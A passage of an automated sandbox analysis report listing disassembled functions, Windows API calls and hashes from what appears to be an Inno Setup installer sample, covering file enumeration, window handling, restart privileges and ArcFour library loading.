                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004784A5,?,00000000,?,?,?,?,00000000,004785FA,?,00000000,?,00000000), ref: 00478481
                                                                            • FindClose.KERNEL32(000000FF,004784AC,004784A5,?,00000000,?,?,?,?,00000000,004785FA,?,00000000,?,00000000), ref: 0047849F
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000,004785FA,?,00000000,?,00000000,?,0047873E,00000000), ref: 004784F8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$First$CloseNext
                                                                            • String ID: dF
                                                                            • API String ID: 2001080981-2048908954
                                                                            • Opcode ID: e3d3b5ea0d471a75f1e892318c37568382ec9ab9af60859860025bbf46b96970
                                                                            • Instruction ID: 1e7589c0754ebee773f1854eaa6e10daa326bf9e4fcfb169a8671094cc7bf5de
                                                                            • Opcode Fuzzy Hash: e3d3b5ea0d471a75f1e892318c37568382ec9ab9af60859860025bbf46b96970
                                                                            • Instruction Fuzzy Hash: 55713F7090020DAFCF11EFA5CC45ADFBBB9EB49304F5084AAE408A7291DB799B45CF59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00453D4C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 00453D5B
                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00453D61
                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00453D7A
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00453DA1
                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00453DA6
                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00453DB7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                            • String ID: SeShutdownPrivilege
                                                                            • API String ID: 107509674-3733053543
                                                                            • Opcode ID: 97208243a47202ed253c42c48129ddaf64d2c6fbfffe2a3ff53d5c10fd5cf2c8
                                                                            • Instruction ID: d8781a87663673bff4f7e6514a95c709f3d412548914224523031170f5c416b5
                                                                            • Opcode Fuzzy Hash: 97208243a47202ed253c42c48129ddaf64d2c6fbfffe2a3ff53d5c10fd5cf2c8
                                                                            • Instruction Fuzzy Hash: 4EF0687039470675E610AE71CD07F6B21F89B40B8BF50482ABD45EA1C3D6BCD60C4A6E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045B4AC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045B4B5
                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045B4C5
                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045B4D5
                                                                            • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047A0C3,00000000,0047A0EC), ref: 0045B4FA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CryptVersion
                                                                            • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                            • API String ID: 1951258720-508647305
                                                                            • Opcode ID: 066b20a5c1c1bbf827e7ba668025f4c9a0b11cdabd4051e249f6bd47f2c53a5d
                                                                            • Instruction ID: 5c97a33bf6e4b00775a7c8e6a9d5d7120da5cee44da396d260546e37c2af37dc
                                                                            • Opcode Fuzzy Hash: 066b20a5c1c1bbf827e7ba668025f4c9a0b11cdabd4051e249f6bd47f2c53a5d
                                                                            • Instruction Fuzzy Hash: E5F012B150170DEEE758DF76EC85A263695E7EC31EF14803B6405551BEE778044ACA1C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00491EBC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00491FFA,?,?,00000000,00494628,?,00492184,00000000,004921D8,?,?,00000000,00494628), ref: 00491F13
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00491F96
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00491FD2,?,00000000,?,00000000,00491FFA,?,?,00000000,00494628,?,00492184,00000000), ref: 00491FAE
                                                                            • FindClose.KERNEL32(000000FF,00491FD9,00491FD2,?,00000000,?,00000000,00491FFA,?,?,00000000,00494628,?,00492184,00000000,004921D8), ref: 00491FCC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$AttributesCloseFirstNext
                                                                            • String ID: isRS-$isRS-???.tmp
                                                                            • API String ID: 134685335-3422211394
                                                                            • Opcode ID: 5f65020aef3fb45fb11887bb1f6e63c6b85ff76842c9e0dedd88080743c31966
                                                                            • Instruction ID: 691f2d73da31f32e7dea4a5c2fc00664967572ef0d2ca01005a435b1a41f50a9
                                                                            • Opcode Fuzzy Hash: 5f65020aef3fb45fb11887bb1f6e63c6b85ff76842c9e0dedd88080743c31966
                                                                            • Instruction Fuzzy Hash: 95318871A0160DAFDF10EF66CC41ADEBBBCDB45304F5084B7A808A32A1D7389E45CE58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00455448 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 241windownativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004554C5
                                                                            • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004554EC
                                                                            • SetForegroundWindow.USER32(?), ref: 004554FD
                                                                            • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,004557D7,?,00000000,00455813), ref: 004557C2
                                                                            Strings
                                                                            • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00455642
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                            • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                            • API String ID: 2236967946-3182603685
                                                                            • Opcode ID: dc33ace31ed7a9797ae01e48b88653b806302b7cb0691c2facf87cd2e3786102
                                                                            • Instruction ID: 0e8bbef3c373df75fc6cad67ac7c13520a564414c71ee93b02e72d74791e7f0d
                                                                            • Opcode Fuzzy Hash: dc33ace31ed7a9797ae01e48b88653b806302b7cb0691c2facf87cd2e3786102
                                                                            • Instruction Fuzzy Hash: EA910034604A44EFD715CF64D961F6ABBF5EB8D704F2080BAE90897792C738AE05CB18
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00454574 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,004546A8), ref: 004545A4
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004545AA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                            • API String ID: 1646373207-3712701948
                                                                            • Opcode ID: ed7d07240aa90892a091206af18c35f348ebfaa97add39f3b53ca1f61f412ce1
                                                                            • Instruction ID: ea8d5c54c38255325536962d047065f6d17d79332955beca5d267283e39a3316
                                                                            • Opcode Fuzzy Hash: ed7d07240aa90892a091206af18c35f348ebfaa97add39f3b53ca1f61f412ce1
                                                                            • Instruction Fuzzy Hash: 27317371A04249ABCB01DFA5D882ADFB7F8EF49704F504567E800F7292D67C5D088A68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00417C40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 00417C7F
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417C9D
                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417CD3
                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417CFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Placement$Iconic
                                                                            • String ID: ,
                                                                            • API String ID: 568898626-3772416878
                                                                            • Opcode ID: 5ece517c437fe019085fbf139a94efe96b230f489b8065151ca60217286486e9
                                                                            • Instruction ID: c7e48a005123f112bfb3c773aae920d88014dc0855fb7fe4f04d55f6c4297c8c
                                                                            • Opcode Fuzzy Hash: 5ece517c437fe019085fbf139a94efe96b230f489b8065151ca60217286486e9
                                                                            • Instruction Fuzzy Hash: 92213E71604204ABCF00EF69D8C4ADA77B8AF48314F11456AFD18DF346D678E984CBA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004601DC Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001,00000000,00460399), ref: 0046020D
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,0046036C,?,00000001,00000000,00460399), ref: 0046029C
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0046034E,?,00000000,?,00000000,0046036C,?,00000001,00000000,00460399), ref: 0046032E
                                                                            • FindClose.KERNEL32(000000FF,00460355,0046034E,?,00000000,?,00000000,0046036C,?,00000001,00000000,00460399), ref: 00460348
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                            • String ID:
                                                                            • API String ID: 4011626565-0
                                                                            • Opcode ID: 5588b96bc5821cb24b794ae90af1c2edfe00c633003d91bf40660c77ef646330
                                                                            • Instruction ID: c22440ca7c527640d667828617bb25d04212bcbd0bedb4656b6a98293150bfae
                                                                            • Opcode Fuzzy Hash: 5588b96bc5821cb24b794ae90af1c2edfe00c633003d91bf40660c77ef646330
                                                                            • Instruction Fuzzy Hash: 3E419930A046189FCB11EF65DC55ADEB7B8EB48705F4044FAF804EB391E67C9E888E59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00460658 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001,00000000,0046083F), ref: 004606CD
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,0046080A,?,00000001,00000000,0046083F), ref: 00460713
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004607EC,?,00000000,?,00000000,0046080A,?,00000001,00000000,0046083F), ref: 004607C8
                                                                            • FindClose.KERNEL32(000000FF,004607F3,004607EC,?,00000000,?,00000000,0046080A,?,00000001,00000000,0046083F), ref: 004607E6
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseErrorFirstModeNext
                                                                            • String ID:
                                                                            • API String ID: 4011626565-0
                                                                            • Opcode ID: 4b6b058d118e51379d164b2f39e0688468813194ab15f3d47b27d756da6eea37
                                                                            • Instruction ID: 403a6866901340eb541ce2889c412c5575f061829704f8cbc5206a85907b83c4
                                                                            • Opcode Fuzzy Hash: 4b6b058d118e51379d164b2f39e0688468813194ab15f3d47b27d756da6eea37
                                                                            • Instruction Fuzzy Hash: 68416335A006189BCB11EF65DC859DFB7B8EB88305F5044BAF804A7351E77CAE448E59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042E6DC Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E6FE
                                                                            • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E729
                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E736
                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E73E
                                                                            • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004518C3,00000000,004518E4), ref: 0042E744
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                            • String ID:
                                                                            • API String ID: 1177325624-0
                                                                            • Opcode ID: 49bff7004518e71781683ab0b22e1c86a9f508c12aad9e85268bd182f546215a
                                                                            • Instruction ID: d5c332dd154d0a6876031c1b9749a0de84ba629fdfa8bcc8c87bd6e344ced3d8
                                                                            • Opcode Fuzzy Hash: 49bff7004518e71781683ab0b22e1c86a9f508c12aad9e85268bd182f546215a
                                                                            • Instruction Fuzzy Hash: AAF0F0B13917207AF620B17A6CC6F7B018CC7C5B68F10823ABB04FF1C1D9A84D05056D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0047DB50 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 0047DB8E
                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 0047DBAC
                                                                            • ShowWindow.USER32(00000000,00000005,00000000,000000F0,00494F8C,0047D3DA,0047D40E,00000000,0047D42E,?,?,00000001,00494F8C), ref: 0047DBCE
                                                                            • ShowWindow.USER32(00000000,00000000,00000000,000000F0,00494F8C,0047D3DA,0047D40E,00000000,0047D42E,?,?,00000001,00494F8C), ref: 0047DBE2
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Show$IconicLong
                                                                            • String ID:
                                                                            • API String ID: 2754861897-0
                                                                            • Opcode ID: 369b3e18d2165cb8bb48b2587b96ca03a768cff027144c2cea394ed926353b1c
                                                                            • Instruction ID: c4c813b94ba675872cbc2921d165099fe1b58c154ab1beafddf731999e56589c
                                                                            • Opcode Fuzzy Hash: 369b3e18d2165cb8bb48b2587b96ca03a768cff027144c2cea394ed926353b1c
                                                                            • Instruction Fuzzy Hash: 5A017170B142819BD700A7B5DC45F9627B85F01318F16847BB4469F3ABCB2DAC42D61C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045EC50 Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,0045ED24), ref: 0045ECA8
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0045ED04,?,00000000,?,00000000,0045ED24), ref: 0045ECE4
                                                                            • FindClose.KERNEL32(000000FF,0045ED0B,0045ED04,?,00000000,?,00000000,0045ED24), ref: 0045ECFE
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 3541575487-0
                                                                            • Opcode ID: 4c8216cd23e0ad7c597990ef92a379c131d9d30fe178f8c8937ccab258ab8b35
                                                                            • Instruction ID: 1c15e069fa90e75a86647c5f7c03675f72fe807dda2d2eae08813ce46935d9d4
                                                                            • Opcode Fuzzy Hash: 4c8216cd23e0ad7c597990ef92a379c131d9d30fe178f8c8937ccab258ab8b35
                                                                            • Instruction Fuzzy Hash: DA21C931504608AEDB15DB67DC41ADEB7BCEB49704F5084F7FC08D22A2D6389B48C959
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042414C Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 00424154
                                                                            • SetActiveWindow.USER32(?,?,?,004687FC), ref: 00424161
                                                                              • Part of subcall function 004235BC: ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
                                                                              • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021E25AC,0042417A,?,?,?,004687FC), ref: 00423ABF
                                                                            • SetFocus.USER32(00000000,?,?,?,004687FC), ref: 0042418E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ActiveFocusIconicShow
                                                                            • String ID:
                                                                            • API String ID: 649377781-0
                                                                            • Opcode ID: 826e83aebfae97061b379bc16a5d1b84d700d2e627d919f03dfb4d2f52cb7ad2
                                                                            • Instruction ID: 52aae3a4689a9740bd4d9c6d6ebd89914a33ab6eb49489b11b5c27e09e1b84ad
                                                                            • Opcode Fuzzy Hash: 826e83aebfae97061b379bc16a5d1b84d700d2e627d919f03dfb4d2f52cb7ad2
                                                                            • Instruction Fuzzy Hash: 6CF03A717001209BDB00AFAAD8C4B9633A8AF48304B55017BBD09EF34BCA7CDC5187A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00417C3E Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 00417C7F
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417C9D
                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417CD3
                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417CFA
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Placement$Iconic
                                                                            • String ID:
                                                                            • API String ID: 568898626-0
                                                                            • Opcode ID: 417382ec3429889133b32bde4c00db047fc4eacd7573cf41adb8130d41789b22
                                                                            • Instruction ID: f0313cfea0d4087130c3a657ee055cc65a4736f61d4b278e94d42609036002a6
                                                                            • Opcode Fuzzy Hash: 417382ec3429889133b32bde4c00db047fc4eacd7573cf41adb8130d41789b22
                                                                            • Instruction Fuzzy Hash: 31015A31204104ABDF10EE6A98C5EEA73A8AF44324F114166FD08CF342E638EC8086A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00417508 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CaptureIconic
                                                                            • String ID:
                                                                            • API String ID: 2277910766-0
                                                                            • Opcode ID: c2a33cdbbae1cdfc2369431b38ce0fc9041f94e7b113fc5137cb4b1fd2442c1e
                                                                            • Instruction ID: 2956aca8664544b1eb357884f6cb47590399079b6183512574be6b3802fdb23b
                                                                            • Opcode Fuzzy Hash: c2a33cdbbae1cdfc2369431b38ce0fc9041f94e7b113fc5137cb4b1fd2442c1e
                                                                            • Instruction Fuzzy Hash: 02F0A471B04602A7DB20E72EC8C4AA762F69F84394B54403BF415C7B96EA7CDCC08318
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00424104 Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 0042410B
                                                                              • Part of subcall function 004239F4: EnumWindows.USER32(0042398C), ref: 00423A18
                                                                              • Part of subcall function 004239F4: GetWindow.USER32(?,00000003), ref: 00423A2D
                                                                              • Part of subcall function 004239F4: GetWindowLongA.USER32(?,000000EC), ref: 00423A3C
                                                                              • Part of subcall function 004239F4: SetWindowPos.USER32(00000000,004240CC,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,0042411B,?,?,00423CE3), ref: 00423A72
                                                                            • SetActiveWindow.USER32(?,?,?,00423CE3,00000000,004240CC), ref: 0042411F
                                                                              • Part of subcall function 004235BC: ShowWindow.USER32(004105C0,00000009,?,00000000,0041ED14,004238AA,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C), ref: 004235D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
